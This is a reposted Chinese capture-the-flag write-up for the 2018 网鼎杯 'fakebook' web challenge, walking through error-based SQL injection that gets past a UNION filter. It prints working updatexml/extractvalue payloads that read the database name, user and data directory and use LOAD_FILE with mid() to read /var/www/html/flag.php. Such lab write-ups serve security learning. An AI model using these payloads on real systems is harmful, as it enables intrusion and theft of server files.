首页 > Web开发 > 详细

CTF-WEB-网鼎杯2018-fakebook

时间:2020-12-03 18:08:58      阅读:25      评论:0      收藏:0      [点我收藏+]

CTF-WEB-网鼎杯2018-fakebook

题目链接
知识考察:SQL报错注入+注入防火墙绕过

解题思路

1、首先注册账号,看到url:http://220.249.52.133:41721/view.php?no=1
技术分享图片

2、尝试对no进行注入payload:1‘,有报错信息显示,证明存在注入点
技术分享图片

3、开始进行SQL注入,联合查询提示no hack,被防火墙阻拦
技术分享图片

4、尝试报错注入,注入成功,可以读取数据库名称、表名,但是没有在数据库找到flag

http://220.249.52.133:41721/view.php?no=1 and updatexml(1,concat(0,database(),0,user(),0,@@datadir),1)#

技术分享图片

5、尝试使用load_file()函数,fuzz,flag.php,可以看到存在flag.php文件在/var/www/html/目录下

and (extractvalue(1,concat(0,(select (LOAD_FILE(‘/var/www/html/flag.php‘))),0)))#

技术分享图片
6、因为updatexml、extractvalue有32位显示限制,结合mid()函数,读出全部flag内容

 and updatexml(1,concat(1,0,(select mid(load_file(‘/var/www/html/flag.php‘),21))),1)#

技术分享图片

CTF-WEB-网鼎杯2018-fakebook

原文:https://www.cnblogs.com/renhaoblog/p/14081011.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!